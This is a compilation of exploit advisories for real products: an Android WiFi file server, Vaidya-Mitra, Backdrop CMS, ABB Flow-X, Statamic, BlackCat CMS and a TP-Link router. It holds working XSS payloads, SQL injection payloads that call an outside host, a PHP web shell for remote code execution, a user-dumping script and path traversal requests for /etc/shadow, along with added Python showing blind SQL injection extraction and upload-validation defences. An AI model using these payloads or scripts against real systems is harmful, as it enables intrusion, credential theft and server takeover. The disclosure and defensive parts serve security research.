<table width="100%" cellspacing="0" cellpadding="16" border="0"><tbody><tr><td style="vertical-align:top;"><table style="background-color: #FFA81E; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" width="700" cellspacing="3" cellpadding="5" border="0"><tbody><tr><td><center><span class="doob_large_text">ERROR</span></center></td></tr></tbody></table><br><table style="background-color: #B2B2B2; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" width="700" cellspacing="3" cellpadding="5" border="0">
<tbody><tr><td><span class="doob_medium_text">Cannot find file or directory! /storage/emulated/0/Download/<a href="https://evil.source" onmouseover="alert(document.domain)"><br>PLEASE CLICK USER PATH TO RETURN INDEX</a></span></td></tr></tbody></table><br><span class="doob_medium_text"><span class="doob_link">&nbsp;&nbsp;<a href="/">>>&nbsp;Back To Files&nbsp;>></a></span></span><br></td></tr></tbody></table><br>
-
<li></li></ul></span></span></td></tr></tbody></table></div><div class="body row scroll-x scroll-y"><table width="100%" cellspacing="0" cellpadding="6" border="0"><tbody><tr>
<td style="vertical-align:top;" width="100%"><form name="multiSelect" style="margin: 0px; padding: 0px;" action="/storage/emulated/0/Download/" enctype="multipart/form-data" method="POST">
<input type="hidden" name="fileNames" value=""><table width="100%" cellspacing="0" cellpadding="1" border="0" bgcolor="#000000"><tbody><tr><td>
<table width="100%" cellspacing="2" cellpadding="3" border="0" bgcolor="#FFFFFF"><tbody><tr style="background-color: #FFA81E; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" height="30"><td colspan="5"><table width="100%" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td style="white-space: nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;</span></td><td style="white-space: nowrap;vertical-align:middle" align="right"><span class="doob_small_text_bold">
&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=23&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a">
<img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img" title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;
<a href="?view=24&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a">
<img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;
<a href="?view=38&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN I
-
<td style="white-space: nowrap;vertical-align:middle"><input value="" type="checkbox" name="selectAll" onclick="setCheckAll();">&nbsp;&nbsp;<a class="doob_button" href="javascript:setMultiSelect('/storage/emulated/', 'action', '18&order=>" <<="">>"<a href="https://evil.source" onmouseover=alert(document.domain)">');javascript:document.multiSelect.submit();" style="">Download</a>&nbsp;<a class="doob_button" href="javascript:setMultiSelectConfirm('Are you sure you want to delete? This cannot be undone!', '/storage/emulated/', 'action', '13&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>');javascript:document.multiSelect.submit();" style="">Delete</a>&nbsp;
<a class="doob_button" href='javascript:setMultiSelectPromptQuery("Create Copy", "/storage/emulated/", "/storage/emulated/", "action", "35&order=>"<<<a href="https://evil.source" onmouseover=alert(document.domain)>", "name");javascript:document.multiSelect.submit();' style="">Create Copy</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Zip</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Unzip</a></td>
<td align="right" style="white-space: nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;&nbsp;&nbsp;&nbsp;<a href="javascript:showTreeview()"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_tree_dark.png" alt="img" title="Show Treeview"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;
<a href="?view=23&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img" title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=24&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;
<a href="?view=38&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_grid.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;</span></td></tr></table>

--- PoC Session Logs ---
http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xml
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost:8000/storage/emulated/0/Download/%3Ca%20href=%22https://evil.source%22%20onmouseover=alert(document.domain)%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3E
GET: HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
-
http://localhost:8000/storage/emulated/0/Download/?mode=<a+href%3D"https%3A%2F%2Fevil.source"+onmouseover%3Dalert(document.domain)><br>PLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: treeview=0
Upgrade-Insecure-Requests: 1
GET: HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html
-
http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xml
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost:8000/storage/emulated/0/Download/%<a href="https://evil.source" onmouseover=alert(document.domain)>%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3E
GET: HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml

Security Risk:
==============
The security risk of the multiple web vulnerabilities in the Android mobile WiFi web-application is estimated as medium.

Vaidya-Mitra 1.0 - Multiple SQLi

## Title: Vaidya-Mitra 1.0 - Multiple SQLi
## Author: nu11secur1ty
## Date: 07.12.2023
## Vendor: https://mayurik.com/
## Software: free: https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html, https://mayurik.com/source-code/P5890/best-hospital-management-system-in-php
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `useremail` parameter of the login request is vulnerable to SQL injection. The payload `'+(select load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'` was submitted in the `useremail` parameter. This payload injects a SQL sub-query that calls MySQL's `load_file` function with a UNC file path that references a host on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. An attacker can easily steal all information from this system, such as login credentials, phone numbers, etc.

STATUS: HIGH Vulnerability

[+]Payload:

```mysql
---
Parameter: useremail (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: useremail=mayuri.infospace@gmail.com'+(select load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'' RLIKE (SELECT (CASE WHEN (5532=5532) THEN 0x6d61797572692e696e666f737061636540676d61696c2e636f6d+(select load_file(0x5c5c5c5c6c726730667377767533773131677039727237656b33623734796172796c6d637030686e3762772e6f6173746966792e636f6d5c5c6d6576))+'' ELSE 0x28 END)) AND 'tsyu'='tsyu&userpassword=rootadmin

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: useremail=mayuri.infospace@gmail.com'+(select load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'' AND (SELECT 3518 FROM(SELECT COUNT(*),CONCAT(0x716a766a71,(SELECT (ELT(3518=3518,1))),0x71626a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gHln'='gHln&userpassword=rootadmin

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: useremail=mayuri.infospace@gmail.com'+(select load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'' OR (SELECT 4396 FROM (SELECT(SLEEP(3)))iEbq) AND 'ZWBa'='ZWBa&userpassword=rootadmin
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/Vaidya-Mitra-1.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/07/vaidya-mitra-10-multiple-sqli.html)

## Time spend:
00:27:00
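The three sqlmap payloads above are one root cause seen three ways: the `useremail` value is spliced into a SQL string, so a single quote closes the literal and everything after it is parsed as SQL, and the `AND 'tsyu'='tsyu` tail re-balances the quotes. The script below is an added example, not the Vaidya-Mitra code. It rebuilds that login pattern against an in-memory SQLite table with constructed sample data, shows the authentication bypass, runs a boolean-based blind oracle in the shape of the first payload (a `CASE WHEN` stands in for the MySQL-specific `RLIKE`/`load_file()` that SQLite lacks), recovers a stored password through the oracle the way sqlmap dumps data, and contrasts the parameterised query that closes the hole. Table and column names other than `useremail`/`userpassword` are assumptions.

```python
import sqlite3


def setup_db() -> sqlite3.Connection:
    """Constructed sample schema and row; not the Vaidya-Mitra database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (useremail TEXT, userpassword TEXT, role TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin@example.com', 's3cret', 'admin')")
    conn.commit()
    return conn


def login_vulnerable(conn, useremail: str, userpassword: str):
    """String-concatenated query: the pattern the advisory's payloads exploit.
    Returns the matched role, or None when no row matches."""
    query = ("SELECT role FROM users WHERE useremail='" + useremail +
             "' AND userpassword='" + userpassword + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, useremail: str, userpassword: str):
    """Parameterised query: the input is bound as data and can never change
    the statement's structure, whatever quotes or keywords it contains."""
    row = conn.execute(
        "SELECT role FROM users WHERE useremail=? AND userpassword=?",
        (useremail, userpassword),
    ).fetchone()
    return row[0] if row else None


def boolean_oracle(conn, condition: str) -> bool:
    """Boolean-based blind probe shaped like the advisory's first payload:
    the row is returned only if `condition` is true. A trailing SQL comment
    removes the password check, so no valid credential is needed."""
    payload = ("admin@example.com' AND (SELECT CASE WHEN (" + condition +
               ") THEN 1 ELSE 0 END)=1 -- ")
    return login_vulnerable(conn, payload, "irrelevant") is not None


def extract_password(conn, email: str, max_len: int = 32):
    """Recover userpassword for `email` one character at a time through the
    oracle: first its length, then each byte by comparing ASCII codes."""
    target = f"(SELECT userpassword FROM users WHERE useremail='{email}')"
    length = next((n for n in range(1, max_len + 1)
                   if boolean_oracle(conn, f"length({target})={n}")), None)
    if length is None:
        return None
    recovered = ""
    for pos in range(1, length + 1):
        for code in range(32, 127):          # printable ASCII
            if boolean_oracle(conn, f"unicode(substr({target},{pos},1))={code}"):
                recovered += chr(code)
                break
    return recovered


if __name__ == "__main__":
    db = setup_db()
    print("bypass via vulnerable login:", login_vulnerable(db, "x' OR '1'='1' -- ", "nope"))
    print("same input, parameterised:  ", login_safe(db, "x' OR '1'='1' -- ", "nope"))
    print("blind extraction:           ", extract_password(db, "admin@example.com"))
```

The out-of-band `load_file()` trick in the advisory only tells the tester the query ran; the boolean oracle is what turns that into data, and the parameterised version returns `None` for every payload above because the quote never leaves the bound string.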

Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)

#Exploit Title: Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)
#Application: Backdrop Cms
#Version: v1.25.1
#Bugs: Stored Xss
#Technology: PHP
#Vendor URL: https://backdropcms.org/
#Software Link: https://github.com/backdrop/backdrop/releases/download/1.25.1/backdrop.zip
#Date of found: 12-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux

2. Technical Details & POC
========================================
1. Login to an account
2. Go to http://localhost/backdrop/?q=admin/config/system/site-information
3. Upload the following SVG file as the site logo
"""
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.location);
  </script>
</svg>
"""
4. Open the uploaded SVG file (http://localhost/backdrop/files/malas_2.svg); the script executes in the site's origin

Request

POST /backdrop/?q=admin/config/system/site-information HTTP/1.1
Host: localhost
Content-Length: 2116
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVXWRsHHM3TVjALpg
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/backdrop/?q=admin/config/system/site-information
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SESS31b3aee8377692ae3f36f0cf7fe0e752=ZuJtSS2iu5SvcKAFtpK8zPAxrnmFebJ1q26hXhAh__E
Connection: close

------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_name"

My Backdrop Site
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_slogan"


------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_mail"

admin@admin.com
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="files[site_logo_upload]"; filename="malas.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.location);
  </script>
</svg>
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_logo_path"


------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="files[site_favicon_upload]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_favicon_path"

core/misc/favicon.ico
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_frontpage"

home
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_403"


------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="site_404"


------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="form_build_id"

form-PnR6AFEKCB5hAWH3pDT2J0kkZswH0Rdm0qbOFGqNj-Q
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="form_token"

siOWtyEEFVg7neDMTYPHVZ2D3D5U60S38l_cRHbnW40
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="form_id"

system_site_information_settings
------WebKitFormBoundaryVXWRsHHM3TVjALpg
Content-Disposition: form-data; name="op"

Save configuration
------WebKitForm

ABB FlowX v4.00 - Exposure of Sensitive Information

# Exploit Title: ABB FlowX v4.00 - Exposure of Sensitive Information
# Date: 2023-03-31
# Exploit Author: Paul Smith
# Vendor Homepage: https://new.abb.com/products/measurement-products/flow-computers/spirit-it-flow-x-series
# Version: ABB Flow-X all versions before V4.00
# Tested on: Kali Linux
# CVE: CVE-2023-1258

#!/usr/bin/python
import sys
import re
from bs4 import BeautifulSoup as BS
import lxml  # parser backend used by BeautifulSoup for features="xml"
import requests

if len(sys.argv) != 2:
    print('Usage: %s <url>' % sys.argv[0])
    sys.exit(1)

# Set the request parameter
url = sys.argv[1]


def dump_users():
    response = requests.get(url)

    # Check for HTTP codes other than 200
    if response.status_code != 200:
        print('Status:', response.status_code, 'Headers:', response.headers,
              'Error Response:', response.text)
        sys.exit(1)

    # Parse the XML response and pull the user names out of the "logged in" log entries
    data = response.text
    soup = BS(data, features="xml")
    logs = soup.find_all("log")
    for log in logs:
        test = re.search('User (.*?) logged in', str(log))
        if test:
            print(test.group(0))


def main():
    dump_users()


if __name__ == '__main__':
    main()

Statamic 4.7.0 - File-Inclusion

## Title: Statamic 4.7.0 - File-Inclusion
## Author: nu11secur1ty
## Date: 07.13.2023
## Vendor: https://statamic.com/
## Software: https://demo.statamic.com/
## Reference: https://portswigger.net/web-security/file-upload

## Description:
Statamic 4.7.0 suffers from an unrestricted file upload vulnerability (reported as file inclusion): the application stores an uploaded HTML file and serves it back from its own origin. An attacker can upload a malicious HTML file and share the URL of the uploaded file with other users on the network; when a victim opens it, the script in the file runs in the application's origin, where it can read the session token and perform further dangerous actions on the victim's behalf.

## Status: HIGH Vulnerability

[+]Exploit:

```html
<html>
<script>
alert(document.cookie);
</script>
</html>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/statamic/2023/statamic-4.7.0)

## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/07/statamic-470-file-inclusion-unsanitized.html)

## Time spend:
01:10:00
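The Backdrop CMS SVG finding above and this Statamic finding share one root cause: the application stores a file that a browser treats as active content (an SVG carrying `<script>`, or a plain HTML document) and then serves it from its own origin, so the embedded script runs with the application's cookies and session in scope. The Python below is an added example, not Backdrop, Statamic or either advisory author's code, of a server-side upload gate for this class of bug. It parses SVG uploads and rejects `<script>` elements, `on*` event handlers, `javascript:` hrefs and embedding elements; sniffs every other upload for HTML markup regardless of its declared extension; and otherwise admits only an image extension allow-list. The two malicious samples are the files shown in the two advisories; the benign SVG and PNG are constructed; function and constant names are assumptions.

```python
import xml.etree.ElementTree as ET

IMAGE_EXTS = {"png", "jpg", "jpeg", "gif", "webp", "ico"}
HTML_MARKERS = (b"<html", b"<!doctype html", b"<script", b"<iframe", b"<body")
EMBEDDING_ELEMENTS = {"foreignobject", "iframe", "embed", "object"}

# Sample from the Backdrop CMS advisory above.
BACKDROP_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.location);
  </script>
</svg>
"""
# Sample from the Statamic advisory above.
STATAMIC_HTML = b"<html>\n<script>\nalert(document.cookie);\n</script>\n</html>\n"
# Constructed benign samples.
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10"><circle cx="5" cy="5" r="4"/></svg>'
BENIGN_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16


def svg_findings(data: bytes) -> list[str]:
    """Return the reasons an SVG must be rejected; an empty list means clean.
    Element and attribute names are compared by local name so a namespaced
    xlink:href or a prefixed svg:script is still caught."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    for el in root.iter():
        if not isinstance(el.tag, str):       # comments / processing instructions
            continue
        local = el.tag.rsplit("}", 1)[-1].lower()
        if local == "script":
            findings.append("<script> element")
        elif local in EMBEDDING_ELEMENTS:
            findings.append(f"<{local}> element")
        for attr, value in el.attrib.items():
            aname = attr.rsplit("}", 1)[-1].lower()
            if aname.startswith("on"):
                findings.append(f"<{local} {aname}> event handler")
            elif aname == "href" and value.strip().lower().startswith("javascript:"):
                findings.append(f"<{local} href=javascript:>")
    return findings


def classify_upload(filename: str, data: bytes) -> tuple[str, str]:
    """Decide what to do with an upload:
    ('accept', ext)               - safe raster image, serve normally
    ('accept-attachment', 'svg')  - clean SVG, serve only as a download
    ('reject', reason)            - active content or disallowed type"""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    head = data[:1024].lower()
    if ext == "svg" or b"<svg" in head:
        problems = svg_findings(data)
        return ("reject", "; ".join(problems)) if problems else ("accept-attachment", "svg")
    for marker in HTML_MARKERS:          # browsers sniff the same way, so must the server
        if marker in head:
            return ("reject", "HTML markup in upload body")
    if ext in IMAGE_EXTS:
        return ("accept", ext)
    return ("reject", f"extension {ext!r} not allowed")


if __name__ == "__main__":
    for name, blob in [("malas.svg", BACKDROP_SVG), ("page.html", STATAMIC_HTML),
                       ("evil.png", STATAMIC_HTML), ("logo.svg", BENIGN_SVG), ("logo.png", BENIGN_PNG)]:
        print(f"{name:10} -> {classify_upload(name, blob)}")
```

Whatever passes the gate should still be served with `X-Content-Type-Options: nosniff` and, for SVG, `Content-Disposition: attachment` or a `Content-Security-Policy: sandbox` header, ideally from a separate static-file origin, so that a parser bypass does not land in the application's cookie scope.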

Blackcat Cms v1.4 - Remote Code Execution (RCE)

Exploit Title: Blackcat Cms v1.4 - Remote Code Execution (RCE)
Application: blackcat Cms
Version: v1.4
Bugs: RCE
Technology: PHP
Vendor URL: https://blackcat-cms.org/
Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
Date found: 13.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================

Steps:

1. Log in to an account as admin.
2. Go to admin-tools => jQuery plugin (http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr).
3. Upload a zip file; this zip file must contain poc.php. poc.php file contents:

```php
<?php $a=$_GET['code']; echo system($a);?>
```

4. Go to http://localhost/BlackCatCMS-1.4/upload/modules/lib_jquery/plugins/poc/poc.php?code=cat%20/etc/passwd

PoC request:

```http
POST /BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr HTTP/1.1
Host: localhost
Content-Length: 577
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBRByJwW3CUSHOcBT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cat7288sessionid=7uv7f4kj7hm9q6jnd6m9luq0ti
Connection: close

------WebKitFormBoundaryBRByJwW3CUSHOcBT
Content-Disposition: form-data; name="upload"

1
------WebKitFormBoundaryBRByJwW3CUSHOcBT
Content-Disposition: form-data; name="userfile"; filename="poc.zip"
Content-Type: application/zip

PKvalsdalsfapoc.php<?php $a=$_GET['code']; echo system($a); ?> blabalaboalpoc.php blablabla
------WebKitFormBoundaryBRByJwW3CUSHOcBT
Content-Disposition: form-data; name="submit"

Upload
------WebKitFormBoundaryBRByJwW3CUSHOcBT--
```
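The Statamic entry above (an uploaded HTML file that is later served from the application's own origin) and this BlackCat CMS entry (a plugin archive whose poc.php lands in a web-served directory) share one missing control: nothing inspects the upload before it is stored. The validator below is an added example written for this page, not Statamic's or BlackCat CMS's code. It assumes an extension allowlist of the application's own choosing, rejects active content both by extension and by sniffing the first bytes, and for zip archives inspects every member before anything is extracted. The sample uploads (an HTML file and the zip archives) are constructed inline.

```python
"""Server-side upload validation (added example, not the vendors' code)."""
import io
import re
import zipfile

# Assumed allowlist of what the application genuinely needs to accept.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf", "zip"}
# Extensions that must never be written into a web-served directory.
SERVER_EXECUTABLE = {"php", "php3", "php4", "php5", "phtml", "phar", "html", "htm", "svg", "js"}

_HTML_MARKERS = re.compile(rb"<\s*(html|script|iframe|body|svg)\b", re.IGNORECASE)
_PHP_MARKER = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def _extension(name: str) -> str:
    """Lower-cased extension of the last path component ('' when there is none)."""
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def looks_like_active_content(data: bytes) -> bool:
    """True if the leading bytes sniff as HTML/JS or PHP, whatever the claimed extension."""
    head = data[:4096]
    return bool(_HTML_MARKERS.search(head) or _PHP_MARKER.search(head))


def check_zip_members(data: bytes) -> list[str]:
    """Reasons to reject an archive; an empty list means every member is acceptable."""
    problems = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            # Member names are attacker-controlled: refuse absolute and '..' paths.
            if name.startswith(("/", "\\")) or ".." in name.replace("\\", "/").split("/"):
                problems.append(f"path traversal in member name: {name!r}")
            if _extension(name) in SERVER_EXECUTABLE:
                problems.append(f"server-executable member: {name!r}")
            elif not info.is_dir() and looks_like_active_content(zf.read(info)):
                problems.append(f"member sniffs as active content: {name!r}")
    return problems


def validate_upload(filename: str, data: bytes) -> list[str]:
    """Validate one upload; returns the rejection reasons (empty list = accept)."""
    ext = _extension(filename)
    problems = []
    if "/" in filename or "\\" in filename or ".." in filename:
        problems.append("filename contains path separators")
    if ext not in ALLOWED_EXTENSIONS:
        problems.append(f"extension {ext!r} not in allowlist")
    if ext == "zip":
        try:
            problems.extend(check_zip_members(data))
        except zipfile.BadZipFile:
            problems.append("not a valid zip archive")
    elif looks_like_active_content(data):
        problems.append("content sniffs as HTML/PHP despite extension")
    return problems


def _build_zip(members: dict[str, bytes]) -> bytes:
    """Helper to construct sample archives in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed sample uploads mirroring the two advisories.
HTML_UPLOAD = b"<html><script>alert(document.cookie);</script></html>"
PHP_IN_ZIP = _build_zip({"poc/poc.php": b"<?php $a=$_GET['code']; echo system($a); ?>"})
CLEAN_ZIP = _build_zip({"plugin/readme.txt": b"jQuery plugin package",
                        "plugin/icon.png": b"\x89PNG\r\n\x1a\n"})

if __name__ == "__main__":
    for name, blob in (("evil.html", HTML_UPLOAD), ("evil.png", HTML_UPLOAD),
                       ("poc.zip", PHP_IN_ZIP), ("plugin.zip", CLEAN_ZIP)):
        print(name, "->", validate_upload(name, blob) or "accepted")
```

The zip check matters because extraction, not the archive's own extension, is what places files on disk: a `.zip` passes a naive extension allowlist while carrying `poc.php`. Sniffing content catches the `evil.png` case where an HTML document is renamed to an allowed extension.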

TP-Link TL-WR740N - Authenticated Directory Traversal

# Exploit Title: TP-Link TL-WR740N - Authenticated Directory Traversal
# Date: 13/7/2023
# Exploit Author: Anish Feroz (Zeroxinn)
# Vendor Homepage: http://www.tp-link.com
# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n
# Tested on: TP-Link TL-WR740N

---------------------------POC---------------------------

Request
-------

```http
GET /help/../../../etc/shadow HTTP/1.1
Host: 192.168.0.1:8082
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
```

Response
--------

```http
